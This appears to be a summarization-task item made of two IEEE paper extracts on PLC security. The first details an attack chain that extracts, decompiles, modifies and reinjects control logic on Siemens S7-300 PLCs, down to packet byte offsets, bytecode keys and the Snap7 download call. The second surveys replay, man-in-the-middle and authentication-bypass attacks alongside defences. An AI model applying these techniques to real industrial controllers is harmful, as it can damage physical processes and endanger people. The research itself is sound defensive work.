by checking the packet header, precisely the protocol ID ( 0x32 ) which is unique for S7Comm frames, and then reads the 13th byte which assigns the functionality of the S7 command request see gure 3. This byte is always set at 0x1e and0x1b for upload and download request respectively. 2) Extract the data payload: After the PLC receives an upload/download request from the engineering station, it re- sponds by sending either its code to the engineering station for an upload request, or an acknowledgement packet informing the user that it is ready to receive the code of a download re- quest; and then the engineering station starts downloading the code into the connected PLC. In this step our extractor records all the response stream for any identi ed upload/download request which eventually contains the bytecode program that the PLC runs. As the network stream consists of different packets e.g. setup communication, job function, block start, block process, block end, etc. our extractor needs rst to lter the stream keeping only the exact S7 packet that the bytecode is transferred with, ignoring the rest of the packets. Our investigation shows that the S7comm packet that the PLC machine bytecode is existing in, has always a larger size than the others, precisely larger than 250 bytes. This is due to the fact that for a very simple control logic that comprises of only one LAD network i.e. only one input and one output, the size of the S7 packet that transfers the program is 254 bytes. Therefore to ensure a successful extraction, our extractor records and saves only the S7 packets that have a size larger than 250 bytes. Please note that the size of the machine bytecode differs signi cantly from each other depending on the complexity and the number of instructions and networks involved in the program, but as we set the ltering process at the minimum size that a PLC program might have, for the Fig. 4: Extract the data payload from S7Comm packetsexample application given in section III, our extractor could successfully lter the network stream to retrieve all S7Comm packets that eventually transfer the machine bytecode. Figure 4 shows the snippet of python code that our extractor uses to lter the network stream and then to extract the raw data from the S7Comm packet. It is worth mentioning that the extracted raw data is in assembly format. Meaning that we still need to convert it into bytecode format for further computing. This is done by utilizing the binascii.hexlify function (as shown in the last line of gure 4). 3) Retrieve the Machine Bytecode from the raw data: Once our extractor has obtained the raw data (that contains the machine bytecode), it then lters this data to retrieve only the machine bytecode which eventually represents the low- level program that the PLC runs. Our ndings show that the machine bytecode is always located between two bytecode keys in the extracted raw data: Start key 0x0082 , and End key 0x6500 as shown in gure 5. Fig. 5: Raw Data of S7Comm packet captured by Wireshark By extracting only the bytes located between these two bytecode keys, we managed successfully to get the machine bytecode which is the input for our decompiler in the next step. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:12 UTC from IEEE Xplore. Restrictions apply. B. Decompiler - decompiling the Machine Bytecode to Ladder Diagram Siemens provides its TIA Portal software for engineers to program PLCs in Ladder Diagram (LAD), Function Block Diagram (FBD), Structured Control Language (SCL), and Statement List (STL). In contrast to the text-based SCL and assembler-like STL, the LAD and FBD languages are graphical. The Ladder Diagram (LAD) consists of networks, each has elements e.g. inputs and outputs. Figure 6 shows a simple network example that has eight input entries, one output entry, and three parallel branches. Fig. 6: An example of Ladder Diagram network in TIA Portal The TIA Portal software compiles the control logic program converting it from its high-level format e.g. LAD version into machine bytecode i.e. MC7 bytecode that the PLC can read and process. In this work, we developed a decompiler that takes the machine bytecode obtained from our extractor as an input and converts it into LAD source code. Our decompiler comprises of two main components: First, the database for mapping each hex-bytes set to their corresponding LAD entries. Second the mapper program, which utilizes the entries found to generate the nal LAD source code. Please note that we mean by instructions: inputs, outputs, memory bits, function blocks, data blocks, timers, counters, etc. while entries mean the different types of instructions such as Boolean, bytes, word, double word, etc. e.g. %I0.1, %Q1.1, %DW0.1, etc. 1) Mapping Database: To create our mapping database, we needed to collect a good number of pairs: hex-bytes to their corresponding LAD entries. This was done by mapping 108 different control logic programs of varying complexity, ranging from simple programs consisting of a few inputs and outputs to more complex ones including multi inputs, outputs, function blocks, data blocks, organization blocks, timers, counters, etc. all the programs are written for different real physical processes such as traf c light, gas pipe, water tank, etc. Creating our mapping database is done by applying an of ine method as follows: we cleared the PLC memory and then opened the TIA Portal software, and programmed the PLC with a certain LAD code containing only a single network consisting of 10 times of the same entry. Here we used 10 times of the input %I0.0. Due to the fact that each LAD network must have at least one output located at the end, we concatenated the 10 inputs with %Q0.0 as an output to closethe network. After that, we downloaded this program into the PLC and used our extractor to retrieve the machine bytecode representing the low-level code of this single LAD network. We could identify that an %I0.0 entry is always mapped to 0xC000 in the bytecode format. Afterwards we cleared the PLC memory again and opened each control logic program used in our experiments in the TIA Portal software separately, and inserted the %I0.0 input before and after each entry taking into account that each LAD network must be closed with an output. Then we downloaded each new modi ed program into the PLC, and retrieved the machine bytecode of each using our extractor. We eventually identi ed each pair of hex- bytes to its corresponding entry in LAD code. After repeating this process for all 108 programs, we managed to create a mapping database consisting of 3802 entries for 34 different instructions. 2) Mapper Program: Our mapper program reads the output of the extractor (the stolen machine bytecode) and calls then the mapping database to identify the corresponding LAD entries. It works in four steps as shown in gure 7. 1- it divides the entire bytecode into smaller groups of hex- bytes using rules-based approach i.e. it takes all the hex- bytes in one group until an output is reached. Then a new group of hex-bytes starts until reaching another output, and so on. 2- it divides each group into sets of hex-bytes, each repre- sents a potential mapping (entry) in the LAD code. 3- it then compares each set of hex-bytes in each group to the pairs in our database. 4- After a successful decompiling, our program generates the LAD code using the following rules seen in gure 8: Fig. 7: Our approach used in the mapper program 1- start a new network until an output is reached. 2- create a new parallel branch at the current entry being decompiled in case a parallel entry is found which is mapped to 0xba00 in bytecode. This new branch includes all the following hex-bytes until a jump entry is reached. 3- end the current branch and jump back down to the entry where 0xba00 is located, in case 0xfb00 is found. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:12 UTC from IEEE Xplore. Restrictions apply. 4- end the current branch and jump back up to the entry where 0xba00 is located, in case 0xbf00 is found. Fig. 8: Rules used in our Mapper Program to generate the nal LAD code Figure 9 shows a part of control logic program decompiled by our LAD decompiler compared to the original one dis- played in the TIA Portal software. C. Modi er - Modifying the Ladder Diagram As it is easier for an attacker to parse and manipulate the control logic for a LAD code than machine bytecode, our attack allows the adversary to modify the code in its LAD format on his wish i.e. he can modify/inject/delete entries or even networks based on his understanding of the exposed physical process. The modi cation in this attack is done by using our LAD modi er. Its functionality is to save all the entries used in the PLC program in a text le, precisely in an instructions list. So all what the attacker needs to modify the PLC program is to open the text le and easily to manipulate the entries listed in the instructions list. Figure 10 shows a snippet of the python code of our modi er. Fig. 10: Snippet code for generating instructions list in a text le As seen, all the decompiled entries that the current PLC program uses are saved in an editable text le (output.txt), and due to the fact that the attacker is already familiar with thephysical process from the previous step, he could modify the instructions list causing damage in the target system. Figure 11 shows an example of modifying the instruction list in the resulting text le. We replaced the output %Q4.7 with %Q4.1, and the input %I5.6 with the output %Q5.3. Fig. 11: Modifying the instructions list in the text le D. Compiler - Compiling the infected LAD source code to machine bytecode After a successful modi cation of the control logic, we need to recompile the infected LAD code to machine bytecode before pushing it back to the target PLC. For achieving this, we designed a compiler which works similar to our above- mentioned decompiler but in a reverse process. It uses the same mapping database to get the equivalent hex-bytes of each entry in the LAD code. Our compiler reads the resulting output of the modi er (the infected LAD code that was saved in a text le), and then calls the mapping database and recompiles the entries into their corresponding hex-bytes. Figure 12 shows the output of our compiler which is the infected machine bytecode that we want the PLC to read and process. E. Injector - Infecting the PLC In the nal step, an attacker has already the malicious code in its machine bytecode format, and all needed to corrupt the system is to push the infected control logic back to the PLC. Due to the lack of integrity checks in S7-300 PLCs, such controllers execute commands whether or not are delivered from a legitimate user. Therefore, our PLC injector crafts the full S7Comm packet that we want to send to the PLC by placing the malicious machine bytecode (obtained from the previous step) in as raw data and then adding the parameters and the proper S7 packet header. In this work, our PLC injector uses the same S7 packet that our extractor already identi ed (see section A.2) and replaces only the original machine bytecode located between the start and end keys with the malicious one (the output of our compiler). Afterwards it injects the crafted packet into the PLC using the well- known Python Snap7 library, precisely function Cli_Download as done in our former work [16]. For our example application given in section III, we managed successfully to alter the physical process controlled by the infected PLC causing a water over ow. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:12 UTC from IEEE Xplore. Restrictions apply. (a) Decompiled Control Logic program (b) Original Control Logic displayed on TIA Portal software Fig. 9: LAD code displayed on the attacker machine and TIA Portal respectively Fig. 12: The original and malicious bytecode respectively V. E VALUATION OF DECOMPILER AND COMPILER To assess the accuracy of our decompiler and compiler, we downloaded 5 programs randomly1to an S7-300 PLC, captured their network traf c and then extracted them from the traf c using our extractor. Afterwards, we run our decompiler to decompile the programs into their LAD source codes, and then compared the decompiled and original LAD code to measure the accuracy of the decompiler. For evaluating the accuracy of our compiler, we also recompiled the decompiled version back to its machine bytecode and compared both 1https://instrumentationtools.com(recompiled and original) versions. The experimental results presented in table 1 show that our decompiler and compiler work 100% correct. VI. D ISCUSSION , SECURITY RECOMMENDATIONS ,AND FUTURE WORK We presented an advanced control logic injection attack for altering the program running in an S7 PLC to disrupt physical processes controlled by the compromised device. Our full attack-chain, including security measures exploitation, de- compilation, Compilation, high-level code modi cation, and PLC injection, was implemented on a real industrial setting, Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:12 UTC from IEEE Xplore. Restrictions apply. TABLE 1: The accuracy of the decompiler and compiler Control Logic Program Entries in TIA PortalEntries in DecompilerEntries in CompilerAccuracy Bottle Detection 7 7 7 100% Automatic Mixing controlling in a Tank11 11 11 100% Temperature control using pulse width modulation16 16 16 100% Car parking 16 16 16 100% Fan control unit System for industry 17 17 17 100% precisely on real S7 300 PLCs, and engineering software TIA Portal. As a part of this work, we used 108 different logic control programs to create a suf ciently large mapping database that consists of 3802 entries for 34 different instruc- tions. Our decompiler and compiler were tested and evaluated for 5 different real industrial control logic programs. The experimental results show that our attack scenario managed successfully to alter the program running in the compromised PLC causing a water over ow for the example application used in this work. From a security point of view, we highly suggest some countermeasures to our attack such as protection and detecting of control logic. The rst step to protect our systems from various sort of attacks is to improve the isolation from other networks [17], combining this with standard security practices [18], and even defence-in-depth security in the control systems [19]. In addition, a digital signature should be employed not only to the rmware as most of the PLC vendors do but also to the control logic. Furthermore, a mechanism to check the protocol header which contains information about the type of the payload is also recommended as a solution to detect and block any potential unauthorized transfer of the control logic. Finally, Siemens provides the users with an MPI adaptor to upload and download the control logic between the TIA Portal and PLC safely. The MPI Protocol is so far not supported by any network sniffers. Taking into account the bene ts of using Ethernet/Pro net connections related to cost and convenience, the MPI connection still provides a better secure communication between the control center and the remote devices. This helps to prevent attackers from snooping which in turn improves security as listening and capturing packets transferred over the network is the main base for attackers to perform most of the attacks against ICSs. The exploit in this paper is ef cient but not at all compli- cated as S7-300 PLCs still use the old version of S7 protocol which lacks of security mechanisms compared to the newer version (S7Comm Plus) that the modern S7 PLCs e.g. S7- 1200 and S7-1500 PLCs use. So in our future work we will investigate if our control injection attack can be run successfully against the modern S7 PLCs. We are aware of the fact that this will be more challenging as S7comm plus protocol supports improved security implementing anti-replay mechanisms and integrity checks.
Summary:
In this paper, we discuss an approach which allows an attacker to modify the control logic program that runs in S7 PLCs in its high-level decompiled format. Our full attack- chain compromises the security measures of PLCs, retrieves the machine bytecode of the target device, and employs a decompiler to convert the stolen compiled bytecode (low-level) to its decompiled version (high-level) e.g. Ladder Diagram LAD. As the LAD code exposes the structure and semantics of the control logic, our attack also manipulates the LAD code based on the attacker s understanding to the physical process causing abnormal behaviors of the system that we target. Finally, it converts the infected LAD code to its executable version i.e. machine bytecode that can run on the PLC using a compiler before pushing the malicious code back to the PLC. For a real scenario, we implemented our full attack-chain on a small industrial setting using real S7-300 PLCs, and built the database (for our decompiler and compiler) using 108 different control logic programs of varying complexity, ranging from simple programs consisting of a few instructions to more complex ones including multi functions, sub-functions and data blocks. We tested and evaluated the accuracy of our decompiler and compiler on 5 random programs written for real industrial applications. Our experimental results showed that an external adversary is able to infect S7 PLCs successfully. We eventually suggest some potential mitigation approaches to secure systems against such a threat.
|
Summarize:
Keywords: PLC vulnerabilities, PLC security, critical infrastructure protection I. I NTRODUCTION Industrial automation is one of the most popular terms that have been discussed over the past decade. Automation is an important aspect when it comes to industrialization. Goal of automation is to minimize the human involvement by both physically and mentally. Most of the critical infrastructure in the world has been automated by means of electronic devices and systems. Most common examples are elevators, escalators and trains. Industrial infrastructure is heavily dependent upon auto- mated control systems. ICSs consist of Supervisory Control and Data Acquisition (SCADA) systems, Distributed Control Systems (DCSs) and Programmable Logic Controllers (PLCs). The main functions of such ICS is to sense (collect data), monitor, manage and perform actions (decision making based on gathered data). A higher portion of an ICS includes hardware devices. But most important part is a computer driven system, which pro- vides an interface to humans who are monitoring the system. Remote or distributed devices such as PLCs are operating under the commands of computers. These commands could be pre-programmed (automated) or manually overridden by people. A computer or a data system could be easily attacked by means of computer viruses. If a virus could attack a computer and affect its programs, an ICS would be vulnerable. Even though the manual override option is available, damage done might be unrecoverable by the time it is activated. Therefore, nding out such vulnerabilities and implementing solutions is vital. G. P. H. Sandaruwan, P. S. Ranaweera and Vladimir A. Oleshchuk are with the Dept. of Information and Communication Technology, University of Agder (UiA), N-4898 Grimstad, Norway.The rest of this paper is organized as follows. Background is explained in Sec. II and then the Related Work is given in Sec. III whereas possible attack vectors on PLC based systems are introduced in Sec. IV . Furthermore, countermeasures for securing PLC based systems are given in Sec.V before the paper is concluded in Sec. VI. II. B ACKGROUND Many believed that a plant control system is an isolated system with no outside world connection. Hence, a possibility of an infection is minimal. Usually computer viruses are ineffective with PLCs. But recent events suggest that SCADA systems are in a signi cant risk even though it is isolated from the plant s main network. In 2000, Queensland waste management plant was hacked by a former employee where large amount of sewage was dumped into public areas in the city. This happened in Aus- tralia only using a laptop and a wireless radio. There was a malfunction in two important monitoring systems in the Ohio Davis-Besse nuclear plant due to a worm been penetrated to computers in 2003 [1]. This kind of malfunction could lead into loss of civilian lives as well. Incidents occurred in 1999 and 1992 at Bellingham and Bernham, Texas respectively caused three deaths and large damage to the infrastructure due to a Gas distribution system malfunction. There were two metro trains collided in 2009 which resulted in deaths and injuries to the passengers [1]. Even though such incidents occurred, there was not any enthusiasm among the scienti c community to explore the security concerns in PLC related automated systems until the recent past. After the discovery of Stuxnet malware in 2010, there was a special eagerness among PLC producers as well as users for determining associated security vulnerabilities in PLC based systems. In other words, Stuxnet opened up a way of redesigning secured PLC architectures. PLC producers such as Hitachi, Mitsubishi, Panasonic, Samsung and Siemens have been working with antivirus producers such as Kaspersky and Symantec to determine solutions for such vulnerabilities and inef ciencies in PLC systems throughout recent years. III. R ELATED WORK Malware poses a signi cant threat to the industrial control systems. Fovino et al. [2] have presented the impact of traditional malware on SCADA systems while enhancing their potential damaging effects. A research carried out by Creery, et al. [3] have put forward a high level analysis regarding possible threats to power plant based control systems. Stuxnet can be regarded as a malware which is known to be discovered in 2010, that affects the normal functionality of industrial control systems having PLCs through PLC Rootkit 2013 IEEE 8th International Conference on Industrial and Information Systems, ICIIS 2013, Aug. 18-20, 2013, Sri Lanka 81 978-1-4799-0910-0/13/$31.00 2013 IEEE Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:20 UTC from IEEE Xplore. Restrictions apply. [4]. A research carried out by R. Masood et al. [5] showed the impact of stuxnet worm on PLC systems by using a pressure sensor as PLC and how pressure value drops to an unacceptable value by changing Keil code of design. According to E. Byres [6] one of the main exploitable weaknesses in industrial control systems are vulnerabilities in the communication protocols and their implementations. In order to nd the shortcomings of the communication protocols, the Group for Advanced Information Technology (GAIT) and Cisco Systems took the initiative in investigating probable vulnerabilities in SCADA protocols MODBUS and MODBUS/TCP [6]. In the quest of nding solutions to malware attacks, analysis of malware is very crucial. In regard to analyzing malware, a limited number of tools are available mainly for analyzing the latest generation of malicious software [7]. CWSandbox [8] is one such tool which is capable of monitoring malware actions on execution. In related to worm simulation, D. Ellis [9] presented a method based on mathematical propagation models using classical epidemiology whereas Liljenstam, et al. [10] proposed a method based on single node worm simulations. According to M. Hentea in order to manage risks, it is important to identify causes of vulnerabilities and establishing vulnerability management life cycle that provides design and technologies required to nd and remediate weaknesses before they are being exploited [11]. A research carried out by Patel, et al. expressed methods for SCADA security risk analysis by combining the concepts vulnerability tree analysis, fault tree analysis and attack tree analysis [12]. IV. PLC V ULNERABILITY ANALYSIS PLCs have been used in industrial control systems for more than four decades, though the impetus on cyber attacks on PLC came in to the picture very recently. PLCs can be considered as PCs, so they are vulnerable to same type of attacks as traditional IT systems [13][14] while operation of the attacks may differ since their target is to deviate the operation of the physical process under the control of PLCs from its safety margins. ICSs use a variety of different protocols to communicate with eld devices such as sensors, actuators as well as for programming and communicating with PLCs in the process network. MODBUS, Ethernet/IP, DNP 317 and ISO-TSAP are among the most commonly used protocols. Though these protocols work ef ciently in communication, they were not de- signed to provide security since security in industrial systems was not a concern when the protocols were rst introduced. So, these protocols do not provide con dentiality, authentication or data integrity while in operation, which makes them vulnerable against a variety of attacks. A. By-pass Logic Attack PLC generally contains two Random Access Memory (RAM) areas known as main memory and register memory. Furthermore, the main memory is used for storing currently executing program logic whereas the register memory is usedas a temporary memory by the currently executing logic [1]. Though register memory is a temporary one, since it is being used by the executing logic it is bound to contain some important variables that would affect the main logic. Generally, industrial plants allow the register memory to be accessed by other PCs across the PLC network along with read and write operations. Moreover, assume that an attacker can gain access to one of the machines in the PLC network and infect that machine with a worm which is capable of writing arbitrary values to the register memory. Since the register memory values changed arbitrarily, it can change the pressure value. Thereafter, exe- cuting logic will set a new value based on the change and that may cause the system to exceed its safety margins and probably driven to a collapse. B. Brute-Force Output Attack The general functionality of a PLC is to make some decision based on the inputs and states and then use that decision to do some change in the electrical output in order to alter a certain physical process. Typically in industrial SCADA networks, most of the PLCs do contain a special functionality called as forcing outputs, which allows a PLC operator to remotely change the output forcefully. This can be achieved by directly connecting to the PLC, through a network or Internet [1]. This process does not require any authentication mechanism, meaning that anyone who has the access can force outputs. Outputs of a PLC may affect physical processes such as governing a speed of a motor or control some valves, switches, etc, which suggests that consequences will be awful if an attacker got the opportunity to exploit it. This attack looks more lethal since the intruder does not need any high level knowledge about logic, only requires the access. C. Exploits on Siemens Simatic S7 PLCs This section emphasizes some attacks that can be imple- mented on Siemens PLCs. PLCs use PROFINET eldbus standard, which is based on Ethernet to create a workable environment for networking protocols and industrial automa- tion. Siemens PLCs use a software called as Simatic TIA and step 7 Engineering software to program the PLCs and the communication between the software and the PLCs is based on International Standards Organization Transport Service Access Point (ISO-TSAP) protocol. This protocol also does not provide any encryption for the data that are exchanged with the PLC, meaning that all data are sent as plaintext. Vulnerabilities discussed below exploits this weakness of the ISO-TSAP protocol. 1) Replay Attack: The general idea of a replay attack is that an attacker intercepts some information or data and uses those data to compromise the system in a later time. Before getting to terms with the replay attack, a simple experiment can be done which gives us some idea about the informa- tion exchanged between the PLC and Step 7 programming software. Let us assume that we have connected a PLC to a 2013 IEEE 8th International Conference on Industrial and Information Systems, ICIIS 2013, Aug. 18-20, 2013, Sri Lanka 82 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:20 UTC from IEEE Xplore. Restrictions apply. test network and run the Step 7 software on the programming PC. In order to analyze the packet ow between the PLC and the software, it is possible to use a packet analyzing software such as wireshark purely because ISO-TSAP protocol which is used for communication is based on Transmission Control Protocol (TCP). After establishing the connection, we can send a CPU STOP command to the PLC and start capturing packets through wireshark. After PLC s CPU has stopped, we can have a look at what sort of information has been exchanged during command execution by analyzing captured packets. Fig. 1 show a TCP stream captured during the execution of CPU STOP command [13]. Fig. 1. Captured TCP stream during a CPU STOP command [13] In Fig. 1, information highlighted in blue which is actually the data sent from PLC to the step 7 Engineering software. It includes some valuable facts about the PLC, such as its type, model number, etc. On the other hand, raw data represented in red color gives some indication about the client side information. This information itself could be very important to an attacker, since this will help an attacker to speci cally build some sort of a malware that could attack a PLC in the system at a later time. Since the above information is revealed through CPU STOP command, this is known as CPU Start- Stop Attack. If the attacker is knowledgeable about the communication between the PLC and the Engineering software, he can capture more information on the PLC as well as its logic and even about the underlying physical process. We earlier showed that interception of packets during a single command could reveal so much of valuable data, so it is obvious that listening to a full communication session will provide much more to an attacker. So, attacker has the capability to reuse the gathered data while manipulating them to his liking as well as adding some malicious codes through a replay attack in order to compromise the PLC. Since all intercepted data is not encrypted, attacker can make the replay attack worse than it looks especially comparing with the replay attacks on normal IT based networks. 2) Man in the Middle (MIM) Attack: Another signi cant vulnerability with ISO-TSAP protocol is that an attacker has the capability to act as a Man in the Middle between communication of the PLC and Step 7 software by taking advantage of authentication less nature of the protocol. So, attacker can gather all data transmitted from software to the PLC and vice versa without being noticed at the two ends. The information that could reveal through MIM may also help an attacker to ef ciently probe an attack on the process beingcontrolled by the PLC. 3) S7 Authentication Bypass Attack: In some cases PLCs can be protected through passwords though it is actually not very popular in industrial automation purely because they did not believe it is possible to mount attacks against PLCs, since the eld network is generally isolated. Even though a PLC is protected through passwords, attacker has the ability of bypassing the authentication due to the lack of security of the protocol. We can explain this scenario as follows. If a proper user needs authenticate himself to the PLC, he will send an authentication packet which contains the hash of the PLC s password. After reception of the packet, PLC can verify the user by comparing its hash value of the password and the received one. If these two are matching, then the user will be authenticated to the PLC providing access to the system. If we consider from the attacker s perspective; if he can grab an authentication packet from a valid user, attacker can replay that packet at a later time to authenticate himself to the PLC. Otherwise he can use a password dictionary with commonly used passwords and hash them to nd a match with the intercepted hash from the user to decrypt the hash and to discover the plaintext password. This will allow the attacker to generate his own authentication packets as well. So this suggests that protecting Siemens PLCs through passwords actually does not achieve its ultimate goal. V. S ECURING PLC S YSTEMS When industrial systems rst deployed, no one believed it is possible to insert a malicious agent in to the system and make the system vulnerable. So, most of the protocols and standards that govern communication inside the system were mainly developed based on this presumption, which has now proved to be wrong. The following are some countermeasures that can be adopted to secure critical infrastructure in industrial systems. A. Protocol Modi cation to Enhance Security The main reason for the vulnerability of PLC based in- dustrial systems is actually due to the aws of the protocols such as DNP3, Modbus and Pro bus that are used for the communication between PLCs and process network machines (MTUs). The inability of these protocols to provide authentica- tion, con dentiality and integrity makes the system exploitable in many ways. Since some of these exploitations do not require a high-level cryptanalytic knowledge makes the scenario far worse. In this section we have discussed a method to secure an existing protocol by introducing some modi cations to Modbus protocol. We will see how we can modify the struc- ture of the protocol, in order to provide data integrity and authentication between nodes of a process network. Fig. 2 illustrates a modi ed Modbus data unit which can ful l our security requirements. 1) Achieving Data Integrity: In order to achieve data in- tegrity, data unit is transmitted along with a Secure Hash Algorithm 2 (SHA2) digest of the data unit. At the reception of data by a device in the process network, it will recalculate the 2013 IEEE 8th International Conference on Industrial and Information Systems, ICIIS 2013, Aug. 18-20, 2013, Sri Lanka 83 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:20 UTC from IEEE Xplore. Restrictions apply. Fig. 2. Secure Modbus Application Data Unit digest from data and check with the digest sent by the source. So, the data unit will only be accepted if the computed digest is matching with the one that is sent by the source device. This suggests that if the data is altered during transmission, new SHA2 digest will differ from the precompiled digest at the source which will allow the destination to detect the alteration of data. 2) Establishing Authentication: It is possible to establish authentication among the end devices of a process network by managing a pair of private and public keys by each of the device. The private key is only known to the device that owns the key whereas the public key is known to all the devices in the network. Consider a case where master device sending a control signal to a slave in the process network. So, the master will generate the relevant data and compute a SHA2 digest and sign it with its private key before sending it to the corresponding slave device. Since, private key is only known to a speci c device, slave device will get the opportunity to authenticate the master by decrypting the signed digest through the master s public key and verifying the digest. 3) Protection against Replay Attacks: In order to prevent replay attacks, there must be some way to distinguish a packet originated just now and a packet that was captured earlier and injected later into the network. This can be achieved by introducing a Timestamp (TS) into the data unit. Since there is a nite time delay between sending and reception of packets as well as devices may not be properly synchronized, the receiver has to use a speci c timing window to decide whether to accept or drop the packet. If the packet arrived to the destination within the speci ed timing window of the receiver, it will be accepted and if not the packet will be discarded. Furthermore, timing window must be large enough to make sure that it will not drop proper packets and at the same time it must be small enough to prevent an attacker from using the timing window for a replay attack. So, it is vital to choose an appropriate timing window. B. Protection via Special Filtering Units Consider a scenario where an attacker succeeds in compro- mising a MTU of the process network. So, the attacker may able to capture the private key of the compromised device and use that to sign a malicious packet which will ultimately looks like a valid packet at the destination since it is signed correctly. As a result, the authentication mechanism may not provide the intended results when a master device is compromised. This issue can be solved by introducing a set of ltering units in between MTUs and eld devices of the process network. We can divide these ltering units into two main categories according to their functionality. They are Signature based lters and Critical state detection lters. Signature based lters use a predetermined set of known attack patterns (sig- natures) and it checks for any signature in the packets that are passing through the lter. Critical state refers to an unwanted state of an industrial process which can lead to a system failure or else affect the safety limits of the process. Typically such states are very common in any industrial system. So, the task of critical state lters is to determine whether any packet passing through, can possibly lead to a critical state by examining the content of the packets. C. Intrusion Detection Systems An attacker seeks access to the SCADA network via several ways. He will select the most vulnerable location in the network. It can be either a host or a high level device. Once infected, that intrusion should be detected. In order to detect them, an Intrusion Detection System (IDS) could be used. An IDS is a set of tools and processes providing network monitoring which gives network administrator the opportunity of analyzing the network traf c. Hence network administrator is capable of detecting any unauthorized or unusual activity present within the network. IDS are usually deployed at an ingress or egress point of the network. Connectivity point of critical network devices is another location to deploy an IDS. It is capable of monitoring the network traf c without impacting it. There are two types of detection systems used in IDSs. They are Signature based IDS and Statistical anomaly based IDS. In signature based systems, IDS compare the collected traf c data with pre-de ned set of rules or signatures . Every malicious process has its own signature. Once determined an IDS could detect and wipe it off from the network. Because of its easy implementation, signature based systems are more popular among vendor community. In order for this method to succeed, signatures of every malware produced should be included in the IDS. But achieving this is impractical. In order to identify Stuxnet malware, it took more than a year. Yet the origin is unknown. Therefore, signature based IDSs do not provide protection, especially against new malwares where the signatures are unknown in order to be programmed to an IDS. Anomaly based IDS can detect any sort of abnormal process occurring inside the network. This is achieved by comparing number of traf c parameters from their normal values. Port numbers, data payloads, bandwidth and protocols are such parameters. Once an anomaly is detected, the IDS will alert the system administrator and rewall and send information about the anomaly. Therefore, administrator has the capability to prevent malware attacks. This method of intrusion detection is effective against all the malwares produced to the current date. An IDS also includes an Intrusion Prevention System (IPS). Function of IPS is to reset the connection and re-program the rewall so that, network will block the traf c corresponding to malicious process. This could be considered as another appli- cation layer rewall. A system which includes both detection and prevention is called an Intrusion Detection and Prevention (IDP) system. Even though such systems are installed in a SCADA system, it should be properly updated, monitored and 2013 IEEE 8th International Conference on Industrial and Information Systems, ICIIS 2013, Aug. 18-20, 2013, Sri Lanka 84 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:20 UTC from IEEE Xplore. Restrictions apply. validated. Otherwise it will not be effective against the most current malicious processes. D. Creating Demilitarized Zones (DMZ) DMZs are logical sub-networks inside a large network which separates the un-trusted segment (Internet) of the net- work from the main network. This process will allow the network administrator to deploy an additional layer of security. An attacker will have access to the un-trusted part of the network only. In this, the whole network is segmented into multiple zones (External, Corporate, Data, Control and Safety) and each zone is rewall protected. This will prevent a threat been propagated to whole network once it infects one partition of the network. Multiple DMZs are proved to be effective against large network architectures. E. Best Practices for Securing PLC Systems There are several best practices that could aid in preventing harmful security attacks to PLC systems. A strong user ac- count management policy should be used. Passwords should be applied for every possible position. Strong passwords should be used. All unused accounts along with default accounts should be disabled. Process network and the Internet should not be connected directly and PLC programming machines and the PLCs must only be connected when they are programmed. Accessing control network through intranet should be controlled and monitored. Remote controlling of devices and maintenance activities should follow a secure methodology that minimizes the possibility of an infection. The usage of external drivers such as USBs should be limited among the users in order to prevent an infection. VI. C ONCLUSIONS In this paper we have focused on revealing the vulnerabili- ties of PLC based SCADA systems and how those vulnerabil- ities would affect the critical infrastructure of common world applications. PLCs have been used as the low level controlling devices in large ICSs. There were attempts by attackers to take control of such PLC based systems after they were introduced. An attacker should infect the corresponding computer which governs the PLC in order to control it. Therefore the security of governing computers in a PLC based system is vital. Vulnerabilities of the process network are similar to an ICT network except for the fact that, they are isolated from the outside network. An infection could occur either by USB drives or Intranet. Securing the system from such exposing points of the network could grant overall protection to the system. In order to protect a PLC system, several methods can be adopted. The most vulnerable area in PLC systems is the lack of security in communication protocols. So enhancing security of such protocols is quite important. Other than that, ltering methods, rewalls, IDSs and DMZs could be introduced into the system to strengthen the overall security.Adopting all these methods at the same time is impractical. It will degrade the performance of the overall system as well as adaptation would not be economically bene cial. An effective combination of such methods should be considered depending upon the vulnerabilities and the architecture (which varies according to the vendor) of the system which needs to be protected. The existing security policies do not provide a complete protection for a PLC system. The deployment of rewalls would not be suf cient to stop the infections. A complex worm like stuxnet could easily bypass the rewall without a trace. An IDS should be deployed along with a rewall in order to prevent the access of infections. Filtering methods would allow detecting state changes and signatures. Designing the network could be done according to DMZs. Future of PLC systems looks bright due to the attention given by scienti c community over the last few years. PLC designers and programmers should be focused on security aspects under the supervision of security experts. Ways of nding better solutions which do not degrade the performance excessively as well as providing an adequate security is an interesting area to be discussed in the future.
Summary:
Programmable Logic Controllers (PLCs) are the most important components embedded in Industrial Control Systems (ICSs). ICSs have achieved highest standards in terms of ef ciency and performance. As a result of that, higher portion of infrastructure in industries has been automated for the comfort of human beings. Therefore, protection of such systems is crucial. It is important to investigate the vulnerabilities of ICSs in order to solve the threats and attacks against critical infrastructure to protect human lives and assets. PLC is the basic building block of an ICS. If PLCs are exploited, overall system will be exposed to the threat. Many believed that PLCs are secured devices due to its isolation from the external networks of the system. The attacks such as Stuxnet have proven the incorrectness of such thoughts. In this paper we have revealed the vulnerabilities of PLCs through a variety of attack vectors which could affect the related critical infrastructure. Furthermore, we have proposed solutions for such weaknesses in PLC based systems.
|
Summarize:
